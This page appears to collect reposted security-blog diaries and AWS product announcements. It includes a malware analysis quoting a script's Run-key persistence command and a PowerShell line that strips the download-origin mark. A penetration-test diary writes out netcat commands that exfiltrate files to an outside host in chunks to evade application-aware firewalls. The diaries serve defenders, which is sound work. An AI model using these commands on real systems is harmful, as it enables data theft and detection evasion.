TeamPCP Supply Chain Campaign: Update 005 – First Confirmed Victim Disclosure, Post-Compromise Cloud Enumeration Documented, and Axios Attribution Narrows, (Wed, Apr 1st)

This post was originally published on this site

This is the fifth update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 004 covered developments through March 30, including the Databricks investigation, dual ransomware operations, and AstraZeneca data release. This update consolidates two days of intelligence through April 1, 2026.

Malicious Script That Gets Rid of ADS, (Wed, Apr 1st)

This post was originally published on this site

Today, most malware are called “fileless” because they try to reduce their footprint on the infected computer filesystem to the bare minimum. But they need to write something… think about persistence. They can use the registry as an alternative storage location.

But some scripts still rely on files that are executed at boot time. For example, via a “Run” key:

reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionRun" /v csgh4Pbzclmp /t REG_SZ /d ""%APPDATA%MicrosoftWindowsTemplatesdwm.cmd"" /f >nul 2>&1

The file located in %APPDATA% will be executed at boot time.

From the attacker’s point of view, there is a problem: The original script copies itself:

copy /Y "%~f0" "%APPDATA%MicrosoftWindowsTemplatesdwm.cmd" >nul 2>&1

Just after the copy operation, a PowerShell one-liner is executed:

powershell -w h -c "try{Remove-Item -Path '%APPDATA%MicrosoftWindowsTemplatesdwm.cmd:Zone.Identifier' -Force -ErrorAction SilentlyContinue}catch{}" >nul 2>&1

PowerShell will try to remove the alternate-data-stream (ADS) “:Zone.Identifier” that Windows adds during file operations. The :Zone.Identifier indicates the source of the file (1 = My Computer, 2 = Local intranet, 3 = Trusted sites, 4 = Internet, 5 = Restricted sites). It's not clear if a "copy" will drop or conserver the ADS. I did not find an official Microsoft documentation but, if you ask to a LLM, it will tell you that they are not preserved. They are wrong!

In my Windows 10 lab, I downloaded a copy of BinaryNinja. An ADS was added to the file. After a copy to "test.ext", the new file has still the ADS!

By removing the ADS, the malicious script makes the file look less suspicious if the system is scanned to search for "downloaded" files (a classic operation performed in DFIR investigations). 

For the story, the script will later invoke another PowerShell that will drop a DonutLoader on the victim's computer.

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Announcing the AWS Sustainability console: Programmatic access, configurable CSV reports, and Scope 1–3 reporting in one place

This post was originally published on this site

As many of you are, I’m a parent. And like you, I think about the world I’m building for my children. That’s part of why today’s launch matters for many of us. I’m excited to announce the launch of the AWS Sustainability console, a standalone service that consolidates all AWS sustainability reporting and resources in one place.

With the The Climate Pledge, Amazon set a goal in 2019 to reach net-zero carbon across our operations by 2040. That commitment shapes how AWS builds its data centers and services. In addition, AWS is also committed to helping you measure and reduce the environmental footprint of your own workloads. The AWS Sustainability console is the latest step in that direction.

The AWS Sustainability console builds on the Customer Carbon Footprint Tool (CCFT), which lives inside the AWS Billing console, and introduces a new set of capabilities for which you’ve been asking.

Until now, accessing your carbon footprint data required billing-level permissions. That created a practical problem: sustainability professionals and reporting teams often don’t have (and shouldn’t need) access to cost and billing data. Getting the right people access to the right data meant navigating permission structures that weren’t designed with sustainability workflows in mind. The AWS Sustainability console has its own permissions model, independent of the Billing console. Sustainability professionals can now get direct access to emissions data without requiring billing permissions to be granted alongside it.

The console includes Scope 1, 2, and 3 emissions attributed to your AWS usage and shows you a breakdown by AWS Region, service, such as Amazon CloudFront, Amazon Elastic Compute Cloud (Amazon EC2), and Amazon Simple Storage Service (Amazon S3). The underlying data and methodology haven’t changed with this launch; these are the same as the ones used by the CCFT. We changed how you can access and work with the data.

As sustainability reporting requirements have grown more complex, teams need more flexibility accessing and working with their emissions data. The console now includes a Reports page where you can download preset monthly and annual carbon emissions reports covering both market-based method (MBM) and location-based method (LBM) data. You can also build a custom comma-separated values (CSV) report by selecting which fields to include, the time granularity, and other filters.

If your organization’s fiscal year doesn’t align with the calendar year, you can now configure the console to match your reporting period. When that is set, all data views and exports reflect your fiscal year and quarters, which removes a common friction point for finance and sustainability teams working in parallel.

You can also use the new API or the AWS SDKs to integrate emissions data into your own reporting pipelines, dashboards, or compliance workflows. This is useful for teams that need to pull data for a specific month across a large number of accounts without setting up a data export or for organizations that need to establish custom account groupings that don’t align with their existing AWS Organizations structure.

You can read about the latest features released and methodology updates directly on the Release notes page on the Learn more tab.

Lets see it in action
To show you the Sustainability console, I opened the AWS Management Console and searched for “sustainability” in the search bar at the top of the screen.

Sustainability console - carbon emission 1

Sustainability console - carbon emission 2

The Carbon emissions section gives an estimate on your carbon emissions, expressed in metric tons of carbon dioxide equivalent (MTCO2e). It shows the emissions by scope, expressed in the MBM and the LBM. On the right side of the screen, you can adjust the date range or filter by service, Regions, and more.

For those unfamiliar: Scope 1 includes direct emissions from owned or controlled sources (for example, data center fuel use); Scope 2 covers indirect emissions from the production of purchased energy (with MBM accounting for energy attribute certificates and LBM using average local grid emissions); and Scope 3 includes other indirect emissions across the value chain, such as server manufacturing and data center construction. You can read more about this in our methodology document, which was independently verified by Apex, a third-party consultant.

I can also use API or AWS Command Line Interface (AWS CLI) to programmatically pull the emissions data.

aws sustainability get-estimated-carbon-emissions 
     --time-period='{"Start":"2025-03-01T00:00:00Z","End":"2026-03-01T23:59:59.999Z"}'

{
    "Results": [
        {
            "TimePeriod": {
                "Start": "2025-03-01T00:00:00+00:00",
                "End": "2025-04-01T00:00:00+00:00"
            },
            "DimensionsValues": {},
            "ModelVersion": "v3.0.0",
            "EmissionsValues": {
                "TOTAL_LBM_CARBON_EMISSIONS": {
                    "Value": 0.7,
                    "Unit": "MTCO2e"
                },
                "TOTAL_MBM_CARBON_EMISSIONS": {
                    "Value": 0.1,
                    "Unit": "MTCO2e"
                }
            }
        },
...

The combination of the visual console and the new API gives you two additional ways to work with your data, in addition to the Data Exports still available. You can now explore and identify hotspots on the console and automate the reporting you want to share with stakeholders.

The Sustainability console is designed to grow. We plan to continue to release new features as we grow the console’s capabilities alongside our customers.

Get started today
The AWS Sustainability console is available today at no additional cost. You can access it from the AWS Management Console. Historical data is available going back to January 2022, so you can start exploring your emissions trends right away.

Get started on the console today. If you want to learn more about the AWS commitment to sustainability, visit the AWS Sustainability page.

— seb

Application Control Bypass for Data Exfiltration, (Tue, Mar 31st)

This post was originally published on this site

In case of a cyber incident, most organizations fear more of data loss (via exfiltration) than regular data encryption because they have a good backup policy in place. If exfiltration happened, it means a total loss of control of the stolen data with all the consequences (PII, CC numbers, …).

While performing a security assessment of a corporate network, I discovered that a TCP port was open to the wild Internet, even if the audited company has a pretty strong firewall policy. The open port was discovered via a regular port scan. In such situation, you try to exploit this "hole" in the firewall. What I did, I tried to exfiltrate data through this port. It’s easy: Simulate a server controlled by a threat actor:

root@attacker:~# nc -l -p 12345 >/tmp/victim.tgz

And, from a server on the victim’s network:

root@victim:~# tar czvf - /juicy/data/to/exfiltrate | nc wild.server.com 12345

It worked but the data transfer failed after approximatively ~5KB of data sent… weird! Every time, the same situation. I talked to a local Network Administrator who said that they have a Palo Alto Networks firewall in place with App-ID enabled on this port.

Note: What I am explaining here is not directly related to this brand of firewall. The same issue may apply with any “next-generation” firewall! For example, Checkpoint firewalls use the App Control blade and Fortinet firewalls use “Application Control”.

App-ID in Palo Alto Networks firewalls is the component performing traffic classification on the protected network(s), regardless of port, protocol, or encryption. Instead of relying on traditional port-based rules (e.g., TCP/80 == HTTP), App-ID analyzes traffic in real time to determine the actual application (e.g., Facebook, Dropbox, custom apps), enabling more granular and accurate security policies. This allows administrators to permit, deny, or control applications directly, apply user-based rules, and enforce security profiles (IPS, URL filtering, etc.) based on the true nature of the traffic rather than superficial indicators like ports. This also prevent well-known protocols to be used on exotic ports (ex: SSH over 12222).

The main issue with this technique is that enough packets must be sent over the wire to perform a good classification. So, the traffic is always allowed first and, if something bad is detected, remaining packets are blocked.

In terms of data volume, there’s no strict fixed threshold, but in practice App-ID usually needs at least the first few KB of application payload to reach a reliable classification. Roughly speaking:

  • <1 KB (or just handshake packets): almost always insufficient → likely unknown or very generic classification
  • ~1–5 KB: basic identification possible for simple or clear-text protocols (HTTP, DNS, some TLS SNI-based detection)
  • ~5–10+ KB: much higher confidence, especially for encrypted or complex applications

That’s why my attempts to exfiltrate data were all blocked after ~5KB.

Can we bypass this? Let’s try the following scenario:

On the external host (managed by me,  the "Threat Actor"), let’s execute a netcat in an infinite loop with a small timeout (because the firewall won’t drop the connection, just block packets:

i=0
while true; do
    filename=$(printf "/tmp/chunk_%04d.bin" "$i")
    nc -l -p 12345 -v -v -w 5 >$filename
    echo "Dumped $filename"
    ((i++))
done

On the victim’s computer, I (vibe-)coded a Python script that will perform the following tasks:
– Read a file
– Split it in chunks of 3KB
– Send everything to a TCP connection (with retries in case of failure of couse)

The code is available on Pastebin[1]. Example:

root@victim:~# sha256sum data.zip
955587e24628dc46c85a7635cae888832113e86e6870cba0312591c44acf9833  data.zip
root@victim:~# python3 send_file.py data.zip wild.server.com 12345
File: 'data.zip' ((359370 bytes) -> 117ll chunk(s) of up to 3072 bytes.
Destination: wild.server.com:12345  (timeout=5s, max_retries=10)

  Chunk 1/1177 sent successfully (attempt 1).
  Chunk 2/1177 sent successfully (attempt 1).
  Chunk 3/1177 sent successfully (attempt 1).
  Chunk 4/1177 sent successfully (attempt 1).
  Chunk 5/1177 sent successfully (attempt 1).
  Chunk 6/1177 sent successfully (attempt 1).
  Chunk 7/1177 sent successfully (attempt 1).
  Chunk 8/1177 sent successfully (attempt 1).
  Chunk 9/1177 sent successfully (attempt 1).
  Chunk 10/1177 sent successfully (attempt 1).
  Chunk 11/1177 sent successfully (attempt 1).
  Chunk 12/1177 sent successfully (attempt 1).
  [...]

And on the remote side, chunks are created, you just need to rebuild the original file:

root@attacker:~# cat /tmp/chunk_0* >victim.zip
root@attacker:~# sha256sum victim.zip
955587e24628dc46c85a7635cae888832113e86e6870cba0312591c44acf9833  victim.zip

The file has been successfully exfiltrated! (the SHA256 hashes are identical). Of course, it's slow but it does not generate peaks of bandwidth that could reveal a huge amount of data being exfiltrated!

This technique worked for me with a file of a few megabytes. It is more a proof-of-concept because firewalls may implement more detection controls. For example, this technique is easy to detect due to the high number of small TCP connections that may look like malware beaconing. It could be also useful to encrypt your data because packets could be flagged by the IDS component of the firewall… 

[1] https://pastebin.com/Ct9ePEiN

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TeamPCP Supply Chain Campaign: Update 004 – Databricks Investigating Alleged Compromise, TeamPCP Runs Dual Ransomware Operations, and AstraZeneca Data Released, (Mon, Mar 30th)

This post was originally published on this site

This is the fourth update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 003 covered developments through March 28, including the first 48-hour pause in new compromises and the campaign's shift to monetization. This update consolidates intelligence from March 28-30, 2026 — two days since our last update.

DShield (Cowrie) Honeypot Stats and When Sessions Disconnect, (Mon, Mar 30th)

This post was originally published on this site

A lot of the information seen on DShield honeypots [1] is repeated bot traffic, especially when looking at the Cowrie [2] telnet and SSH sessions. However, how long a session lasts, how many commands are run per session and what the last commands run before a session disconnects can vary. Some of this information could help indicate whether a session is automated and if a honeypot was fingerprinted. This information can also be used to find more interesting honeypot sessions.

TeamPCP Supply Chain Campaign: Update 003 – Operational Tempo Shift as Campaign Enters Monetization Phase With No New Compromises in 48 Hours, (Sat, Mar 28th)

This post was originally published on this site

This is the third update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 002 covered developments through March 27, including the Telnyx PyPI compromise and Vect ransomware partnership. This update covers developments from March 27-28, 2026.

TeamPCP Supply Chain Campaign: Update 002 – Telnyx PyPI Compromise, Vect Ransomware Mass Affiliate Program, and First Named Victim Claim, (Fri, Mar 27th)

This post was originally published on this site

This is the second update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 001 covered developments through March 26. This update covers developments from March 26-27, 2026.

Customize your AWS Management Console experience with visual settings including account color, region and service visibility

This post was originally published on this site

In August 2025, we introduced AWS User Experience Customization (UXC) capability to tailor user interfaces (UIs) to meet your specific needs and complete your tasks efficiently. With this capability, your account administrator can customize some UI component of AWS Management Console, such as assigning a color to an AWS account for easier identification.

Today, we’re announcing additional customization capability in UXC that enables selective display of relevant AWS Regions and services for your team members. By hiding unused Regions and services, you can reduce cognitive load and eliminate unnecessary clicks and scrolling, helping you focus better and work faster. With this launch, we offer the ability to customize account color, Region, and service visibility together.

Categorize account by color
You can set a color for your accounts to visually distinguish between them. To get started, sign in to the AWS Management Console and choose your account name on the navigation bar. Your account color isn’t set yet. To set the color, choose Account.

In the Account display settings, select your preferred account color and choose Update. You can see the chosen color in the navigation bar.

By changing the account color, you can clearly distinguish the account’s purpose. For example, you can use orange for development accounts, light blue for test accounts, and red for production accounts.

Customize Regions and services visibility
You can control which AWS Regions appear in the Region selector or which AWS services appear in the console navigation. In other words, you can set to show only the Regions and services that are relevant to your account.

To get started, choose the gear icon on the navigation bar and choose See all user settings. If you are in an administrator role, you can see a new Account settings tab in the unified settings. If you have not configured a setting, all Regions and services are visible.

To set visible Regions, choose Edit in the Visible Regions section. Select your visible Regions to All available Regions or Select Regions and configure your list. Choose Save changes.

After configuring visible Region setting, you will find only selected Regions in the Regions selector on the navigation bar in the console.

You can also set visible services in the same way. Search or select services from the category. I used the Popular services category to select my favorites. When you finish selection, choose Save changes.

After configuring visible services setting, you will find only selected services in the All services menu on the navigation bar.

When you search the service name in the search bar, you can only choose selected services.

The Regions and services visibility settings control only the appearance of services and Regions in the console. They don’t restrict access through the AWS Command Line Interface (AWS CLI), AWS SDKs, AWS APIs, or Amazon Q Developer.

You can also manage these account customization settings programmatically with new visibleServices and visibleRegions parameters. For example, you can use AWS CloudFormation sample template:

AWSTemplateFormatVersion: "2010-09-09"
Description: Customize AWS Console appearance for this account

Resources:
  AccountCustomization:
    Type: AWS::UXC::AccountCustomization
    Properties:
      AccountColor: red
      VisibleServices:
        - s3
        - ec2
        - lambda
      VisibleRegions:
        - us-east-1
        - us-west-2

And you can deploy your Cloudformation template.

$ aws cloudformation deploy 
  --template-file account-customization.yaml 
  --stack-name my-account-customization

To learn more, visit the AWS User Experience Customization API Reference and AWS CloudFormation template reference.

Give it a try in the AWS Management Console today and provide feedback by selecting the Feedback link at the bottom of the console, posting to the AWS re:Post forum for the AWS Management Console, or reaching out to your AWS Support contacts.

Channy

TeamPCP Supply Chain Campaign: Update 001 ? Checkmarx Scope Wider Than Reported, CISA KEV Entry, and Detection Tools Available, (Thu, Mar 26th)

This post was originally published on this site

This is the first update to the TeamPCP supply chain campaign threat intelligence report, “When the Security Scanner Became the Weapon” (v3.0, March 25, 2026). That report covers the full campaign from the February 28 initial access through the March 24 LiteLLM PyPI compromise. This update covers developments since publication.